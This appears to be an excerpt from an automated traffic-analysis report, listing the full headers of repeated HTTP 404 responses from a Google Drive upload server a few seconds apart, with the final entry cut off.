      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:23 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-KNI-Teaqz8V2xSJeDX3NsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7GmGIfpUg2Ify1PaAvOUmIAwtFIitUAy0QmfOd9imZL-i3uCz6OpPDeqsJpmkgu-9hSPPzRfQZsgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-OL1--5BaKnVjYlJAzZJb9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC4VhU31ORDUXpE0CLbuQ5mCrmXeCnJ8qgNojShjeVZr7Zh26PcVor7TPkpz_S9BsmTiZ-W4al45TQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:34 GMTContent-Security-Policy: script-src 'nonce-P5H0aHfPGSlumNyI8nhDiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC7I6SN12om3jzpykNrFOKJOawTPTvqtdMuyFBuTNvGA6oPEmOvYJ6uMR4dGOlfFAmmmeAVpE4IPLAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:40 GMTContent-Security-Policy: script-src 'nonce-p8EvI-82T8v5BjV7A92iNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5beLnL5QzQF8Ycy0R-t3P2FjfFgFniNT9o55-3xIOD0Q7Z9skv201rLe9F1hF3wT0PorXc6kUIcgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:45 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-h6UIz2VSNNV4WndnJiCAmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC7rP1NHeXdQVUdi8CB0M2dXZ1NDnrOiy9uX11jSHRvd7us6dJzRfNVd376ScjnNpczzLvYLodsyIgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-E3SL-r0hctxHGFX8VRfLEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5GQWEqRgPNTFwzgx-9_mXkpGGwCjPNsEZAGTKOdiZ_SB30ExC_QLCu2cWBcizoe15JR8zRqYZ1oQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:57 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-mEk3TmjwGJzJy7oiUWC7ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7lxyRjYr-0TlRhywSH3PcboZ8zH1cYvAF2MlskU-v3ri_e0Y6qaySvDn-pJoWK23yAQw_h85bB3wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:02 GMTContent-Security-Policy: script-src 'nonce-GUfdNp9Y8W4ROMNRSIx-ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6yOryCjVV3EbeUPRCxsjmBilTy1OBwe3mp30y50a8AhDz2NIny20i1IKUnw5xBzbDOM3sGq5LmLgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:08 GMTContent-Security-Policy: script-src 'nonce--MWVypKTJpvoZBJQG-DpWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5PnXHGCOH4U0tLIdcp2EiDEstZnrcLE95LsHQ4uhq0LTK1vFJqg7gPWO1Z38B4qI_NiL8vow_5rgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:13 GMTContent-Security-Policy: script-src 'nonce-qN0EOC1nkznqPMHC5H4CwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6e3vQNlkqAnAUNL2HM9xixg4Q8hqxab00eFSxbfE0KmhrjA2tCiAHuc60PDK5w9p42DmKHsPTIdgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:19 GMTContent-Security-Policy: script-src 'nonce-uQnJiq9ftKYWIFgJSKS7ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC4KK_QXxtN71vNgIHyHNOnVpkJv2vMEDcGcsNKDoqjJKAyAlMXr4ryhn6sANgft83lIaHj9KmjXjAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:25 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-G1sjsUQBpFxkqgdo00w9rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5uR8lsNnRvlGgfeXXGdwzVFx5uF-sejHIkH3uXWr-l-67McK6aGeqJ8bUNyBtuk_oMZF5fRihGmAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:30 GMTContent-Security-Policy: script-src 'nonce-wQUTh5tMvCUH6jfTn9a2gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7aVP3m36V3K72LO1xnjhEHY_JxMjWLvId9f9M4AcNUKPUpG5zfVC-3iOGXpCe6tCHanTWSlTq95gServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:36 GMTContent-Security-Policy: script-src 'nonce-RJ_hvRnWK2g0YmNJJ1PXpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5xDYlQTK7BKyA1lXs-m8AlqWFk7LeiVOfjAc9BrL8Y85GpZOASDEEJN8t_2kivpJOUez9wttJsNwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:41 GMTContent-Security-Policy: script-src 'nonce-L9wWrCcO5xZIkLBXMP801A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: 